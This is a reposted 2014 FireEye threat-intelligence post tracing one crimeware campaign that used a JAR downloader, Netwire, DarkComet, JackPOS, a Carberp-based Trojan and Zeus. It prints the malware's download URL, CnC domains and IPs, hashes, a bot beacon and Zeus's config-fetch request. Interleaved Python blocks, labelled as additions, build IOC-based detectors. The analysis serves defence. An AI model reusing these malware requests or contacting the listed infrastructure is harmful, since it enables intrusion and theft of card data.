Thursday, April 17, 2014

[fireeye] Crimeware or APT? Malware’s “Fifty Shades of Grey”

Some cybercriminals build massive botnets to use unsuspecting endpoints for spam, distributed denial-of-service (DDoS) attacks, or large-scale click fraud. With the aid of banking Trojans, other cybercriminals create smaller, specialized botnets that focus on stealing bank credentials and credit card information.

Remote access tools, or RATs, are an integral part of the cybercrime toolbox. For example, a recent FireEye investigation into XtremeRAT revealed that it had been propagated by spam campaigns that typically distribute Zeus variants and other banking-focused malware. This tactic may stem in part from the realization that compromising retailers can net millions of credit card numbers in one fell swoop.
Malware designed to compromise point-of-sale (POS) systems is not a new phenomenon. But we have seen a recent surge in malware that specifically targets these systems (e.g. Chewbacca, Dexter, BlackPOS and JackPOS). Moreover, POS malware is being deployed in an increasingly targeted manner. For example, some attacks against retailers have been characterized as “APT style” attacks — a designation traditionally reserved for malware-based espionage sponsored on some level by nation-states.
The extent to which such attacks are targeted, and not opportunistic, is unclear. The attackers could be singling out specific retailers in advance. Or they could be targeting an entire industry, simply capitalizing on opportunities that arise.
In this blog post, we examine one case that clearly illustrates the nature of this problem.

Attack Vector

The suspicious email shown in Figure 1, which was sent to several companies, prompted us to take a closer look.
Figure 1: Malicious email with JAR attachment
The content of the email is consistent with traditional spam messages that typically propagate banking Trojans. It does not appear to target the recipients specifically. The attachment is a Java archive file (JAR). When executed, the JAR file attempts to download and run an EXE from a remote location. The JAR does not contain a Java exploit per se; it simply uses the java.net.URLConnection class to download the executable, which requires no exploit because the JAR is not running inside a sandbox.
The file “CUP retrieval request for 18 Feb 2014.jar” (2fd3c07ac16393723b528ca29a028c00) contains the following:

Size   Compressed   Name
42      50          cfg/config
104     106         META-INF/MANIFEST.MF
3905    2212        CrossPlatformInstaller.class
The “config” file contains the location of the EXE to be downloaded:

101#hxxp://himselp.net.in/css/acrord.exe

The file “acrord.exe” connects to rglink77[.]no-ip[.]biz / 37.220.31.113.
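The triage step described above (listing the archive, reading cfg/config and pulling out the download URL) can be scripted. The following is an added example, not code from the original post or from FireEye: it builds a constructed stand-in for the JAR (entry names and the config line are the post's, the manifest and class bytes are invented here, so the sizes differ from the listing above) and then inspects it the way an analyst would inspect the real attachment. The "<number>#<url>" layout is taken from the post's config entry; the meaning of the leading number is not documented there, so it is captured but not interpreted.

```python
import io
import re
import zipfile


def build_sample_jar() -> bytes:
    """Constructed sample: same entry names as the post's JAR, invented bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("cfg/config", "101#hxxp://himselp.net.in/css/acrord.exe")
        zf.writestr(
            "META-INF/MANIFEST.MF",
            "Manifest-Version: 1.0\r\nMain-Class: CrossPlatformInstaller\r\n",
        )
        # Class-file magic followed by padding; not a real class.
        zf.writestr("CrossPlatformInstaller.class", b"\xca\xfe\xba\xbe" + b"\x00" * 60)
    return buf.getvalue()


# "<number>#<url>"; accepts both live (http) and defanged (hxxp) schemes.
CONFIG_RE = re.compile(r"^(?P<tag>\d+)#(?P<url>(?:https?|hxxps?)://\S+)$")


def inspect_jar(data: bytes) -> dict:
    """Return the entry listing, the manifest Main-Class and any configured URL."""
    report = {"entries": [], "main_class": None, "download_url": None}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            report["entries"].append((info.file_size, info.compress_size, info.filename))
        names = set(zf.namelist())
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Main-Class:\s*(\S+)", manifest, re.MULTILINE)
            if m:
                report["main_class"] = m.group(1)
        if "cfg/config" in names:
            cfg = zf.read("cfg/config").decode("utf-8", "replace").strip()
            m = CONFIG_RE.match(cfg)
            if m:
                report["download_url"] = m.group("url")
    return report


def looks_like_downloader(report: dict) -> bool:
    """A tiny JAR whose config points at an .exe is the downloader pattern seen here."""
    url = report["download_url"]
    return url is not None and url.lower().endswith(".exe")


def format_listing(report: dict) -> str:
    """Render the entries in the same Size / Compressed / Name layout as the post."""
    lines = [f"{'Size':<8}{'Compressed':<12}Name"]
    for size, comp, name in report["entries"]:
        lines.append(f"{size:<8}{comp:<12}{name}")
    return "\n".join(lines)


if __name__ == "__main__":
    rep = inspect_jar(build_sample_jar())
    print(format_listing(rep))
    print("Main-Class:", rep["main_class"])
    print("Download URL:", rep["download_url"])
    print("Downloader-style JAR:", looks_like_downloader(rep))
```

Run against a real attachment by replacing `build_sample_jar()` with the file's bytes; the URL is only extracted, never fetched, so the script is safe to run on a quarantined sample.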

Netwire

The payload in this case is the Netwire RAT. Netwire emerged in 2012. It can be used to build malware for multiple operating systems, including Windows, MacOS, and Linux. The RAT is marketed on a variety of underground forums, selling for $40–$140.
This sample was configured with the tag “UNIPAY”, so that the attackers know which hosts were compromised during this campaign.
While looking at the server hosting the file, which appears to be a compromised — but otherwise legitimate — website, we found an additional Netwire sample:
MD5                               Filename   Domain           IP
8b0cd4952da32523524b1d30822ef0a8  adobe.exe  c0der.zapto.org  46.183.220.17

Email Extractor

We also discovered a simple tool that is used to extract email addresses. We found the output of this tool, which consisted of a list of 8,507 email addresses. It also contains the email that was used by the “sender” and its recipient (although we have seen other recipients that are not on this list).
The list contains 1,351 domains that primarily appear to be banks, financial services companies (money transfer / exchange, investment), and businesses (such as shipping, engineering, IT) in the Middle East and Asia. In other words, these attackers are interested in a wide variety of targets.
A website statistics package on the server reveals that “acrord.exe” had been downloaded 802 times. This indicates that up to 9.4% of the targets may have opened the malicious attachment — and thus may have been compromised.

DarkComet

In addition to the Netwire RAT, the attackers are also using the DarkComet RAT. DarkComet has been available for free since 2008. It is popular on a variety of underground forums and used by a wide range of actors for many purposes. (After reports indicated that DarkComet was used in connection with the conflict in Syria, the creator of DarkComet, DarkCoderSC, created a removal tool and ultimately quit developing the RAT).
In this case, the attackers used an older version of DarkComet (4.0) and specified the ID of “Email”, which probably indicates the attack vector for this campaign.
MD5                               Filename  Domain                 IP
ae6b419f4eb619d4be45dbfe6660a670  oni.exe   privatecode.zapto.org  209.166.87.161
12d8469512b581b60d7d5cce0733904d  dcr.exe   privatecode.zapto.org  209.166.87.161

JackPOS

We also found that the attackers were using JackPOS, a malware tool that has been previously used in successful attacks. JackPOS can dump memory and look for Track 1 and Track 2 credit card data using regular expressions. This data is then uploaded to a command-and-control (CnC) server.
MD5                               Filename  Domain          IP
e7f1ba73cca6d99819d27216d09ecbbb  spp.exe   akuna.mcdir.ru  178.208.83.38
We don’t know how the attackers were deploying JackPOS in this particular case, but we suspect that once targets of interest were identified using either Netwire or DarkComet, the attackers would then deploy JackPOS to steal credit card information.

Handsnake

The attackers in this case are also using a Carberp-based Trojan that has VNC capabilities that we call “handsnake.” This Trojan is described in more detail in a Polish-language white paper.
MD5                               Filename  Domain  IP
aa8268ed9f8b32b708f50b56347075ab  xxx.exe   -       185.29.8.19
Upon execution, the malware begins communication with the CnC server. The decrypted beacon is:

{
  "type": "handsnake",
  "GUID": "{[GUID]}",
  "BuildId": "plm_build",
  "CompName": "[COMPUTERNAME]",
  "SystemVersion": "Windows XP Professional Service Pack 3 (build 2600); English (United States)",
  "ProcessorType": 32,
  "ProcessorsCount": 1,
  "ProcessorSpeed": 2581,
  "BotVersion": 34144256,
  "MemorySize": 511,
  "token": false,
  "TimeZone": "GMT--7:00",
  "UpTime": 222,
  "IdleTime": 1,
  "HaveWebCam": false,
  "UserName": "admin",
  "Online": 1
}
At this point, the attackers can use the remote desktop function of the VNC component to take full control of the compromised system.
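A decrypted beacon like the one above is a useful artefact for incident response: it identifies the family, the build and the victim host. The following is an added example, not code from the post or from FireEye, that recognises a handsnake beacon by its "type" field and a set of keys present in the quoted sample (the choice of required keys is this example's own, not a documented protocol rule), then normalises it into a host record. The sample beacon is the post's own, with its [GUID] and [COMPUTERNAME] redactions kept as-is.

```python
import json
import re

# Constructed sample: the decrypted beacon quoted in the post, redactions included.
SAMPLE_BEACON = (
    '{"type":"handsnake","GUID":"{[GUID]}","BuildId":"plm_build",'
    '"CompName":"[COMPUTERNAME]","SystemVersion":"Windows XP Professional '
    'Service Pack 3 (build 2600); English (United States)","ProcessorType":32,'
    '"ProcessorsCount":1,"ProcessorSpeed":2581,"BotVersion":34144256,'
    '"MemorySize":511,"token":false,"TimeZone":"GMT--7:00","UpTime":222,'
    '"IdleTime":1,"HaveWebCam":false,"UserName":"admin","Online":1}'
)

# Keys present in the quoted beacon that this example requires before it
# treats a message as a match (hypothetical selection, not a protocol spec).
REQUIRED_KEYS = {"type", "GUID", "BuildId", "CompName", "SystemVersion",
                 "BotVersion", "UserName"}

BUILD_RE = re.compile(r"\(build (\d+)\)")


def parse_handsnake_beacon(text: str):
    """Return a normalised host record if `text` is a handsnake beacon, else None."""
    try:
        obj = json.loads(text)
    except ValueError:
        return None  # not JSON at all
    if not isinstance(obj, dict) or obj.get("type") != "handsnake":
        return None
    if not REQUIRED_KEYS.issubset(obj):
        return None  # right family tag but missing fields; do not trust it
    # "SystemVersion" packs OS and locale into one string separated by ';'.
    os_part, _, locale = obj["SystemVersion"].partition(";")
    build = BUILD_RE.search(os_part)
    return {
        "guid": obj["GUID"].strip("{}"),
        "build_id": obj["BuildId"],
        "hostname": obj["CompName"],
        "user": obj["UserName"],
        "os": os_part.strip(),
        "os_build": int(build.group(1)) if build else None,
        "locale": locale.strip() or None,
        "bot_version": obj["BotVersion"],
        "timezone": obj.get("TimeZone"),
        "webcam": bool(obj.get("HaveWebCam", False)),
    }


if __name__ == "__main__":
    record = parse_handsnake_beacon(SAMPLE_BEACON)
    for key, value in record.items():
        print(f"{key:>12}: {value}")
```

The strict schema check matters in practice: a loose match on the word "handsnake" alone would also fire on this blog post's text if it were ever captured on the wire.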

Zeus

In addition to the RATs and POS malware described above, we have also seen the attackers deploy the Zeus banking Trojan. They are using version MMBB 2.9.6.1, which has been previously described here.
MD5                               Filename  Domain  IP
667c4f78fc1aeb45700734accc85e402  xbot.exe  -       217.23.1.188
When executed, the malware connects to the CnC server to download the “config” file, which contains the “webinjects” to be used:

GET /modules/config.bin HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)
Host: 217.23.1.188
Cache-Control: no-cache
The only major difference between this version of Zeus and previous versions is the shift from RC4 encryption to AES encryption.
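The config fetch above gives a defender two network signals besides the CnC address itself: a GET for a config.bin under /modules/, and a User-Agent that claims MSIE 6.0 on Windows NT 6.2 (Windows 8), a combination no real browser produces because IE6 was never available for Windows NT 6.x. The following is an added example, not code from the post or from FireEye, that runs those checks together with the domains and IPs from this post's tables over a few constructed proxy log lines in a hypothetical "timestamp src dst method url "user-agent"" layout.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the tables in this post (proxy logs cannot match MD5s).
IOC_DOMAINS = {"rglink77.no-ip.biz", "c0der.zapto.org",
               "privatecode.zapto.org", "akuna.mcdir.ru"}
IOC_IPS = {"37.220.31.113", "46.183.220.17", "209.166.87.161",
           "178.208.83.38", "185.29.8.19", "217.23.1.188"}

# Exact User-Agent from the Zeus request quoted above.
ZEUS_UA = "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)"

# Hypothetical proxy log layout: ts src dst method url "user-agent".
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)
UA_RE = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+)\.\d+")

# Constructed sample lines; lines 1 and 3 touch infrastructure named in the post,
# line 4 fetches a config.bin from an unrelated host with an ordinary browser UA.
SAMPLE_LOG = [
    '2014-02-18T10:01:12Z 10.0.0.15 217.23.1.188 GET http://217.23.1.188/modules/config.bin '
    '"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)"',
    '2014-02-18T10:02:03Z 10.0.0.22 93.184.216.34 GET http://www.example.com/index.html '
    '"Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0"',
    '2014-02-18T10:03:40Z 10.0.0.31 209.166.87.161 POST http://privatecode.zapto.org/ "-"',
    '2014-02-18T10:05:00Z 10.0.0.15 198.51.100.7 GET http://cdn.example.net/modules/config.bin '
    '"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36"',
]


def inconsistent_msie_ua(ua: str) -> bool:
    """IE6 was never available on Windows NT 6.x (Vista and later), so an
    MSIE 6 token paired with NT 6+ is a forged User-Agent."""
    m = UA_RE.search(ua)
    if not m:
        return False
    msie_major, nt_major = int(m.group(1)), int(m.group(2))
    return msie_major <= 6 and nt_major >= 6


def analyse_line(line: str):
    """Return (fields, reasons) for a parsable line, or None for garbage."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    parts = urlsplit(f["url"])
    host = parts.hostname or ""
    reasons = []
    if host in IOC_DOMAINS or host in IOC_IPS or f["dst"] in IOC_IPS:
        reasons.append("known CnC infrastructure")
    if f["method"] == "GET" and parts.path.endswith("/config.bin"):
        reasons.append("config.bin fetch (Zeus config download pattern)")
    if f["ua"] == ZEUS_UA:
        reasons.append("User-Agent identical to the observed Zeus sample")
    elif inconsistent_msie_ua(f["ua"]):
        reasons.append("self-contradictory MSIE/Windows NT User-Agent")
    return f, reasons


def scan(lines):
    """Alert on any IOC hit, or on two or more of the weaker behavioural signals."""
    alerts = []
    for line in lines:
        result = analyse_line(line)
        if result is None:
            continue
        f, reasons = result
        if "known CnC infrastructure" in reasons or len(reasons) >= 2:
            alerts.append({"src": f["src"], "dst": f["dst"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["src"], "->", alert["dst"], ":", "; ".join(alert["reasons"]))
```

The scoring keeps the single config.bin fetch on line 4 below the alert threshold: a path name on its own is a weak signal, whereas the forged User-Agent keeps working as a detection even after the attackers move to new CnC addresses.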

Conclusion

The world of cybercrime features a broad spectrum of bad actors. On one end, highly focused state-sponsored attackers use custom tools and zero-day exploits. On the other end, “commodity” cybercriminals use widely deployed exploit kits that indiscriminately compromise thousands of systems around the globe.
In the middle are (at least) “fifty shades of grey.” One class of attacker mixes publicly available malware platforms and custom tools. These latter cases suggest that it is not always easy to estimate the size or sophistication of an adversary simply by finding one piece of what may be a far larger puzzle.
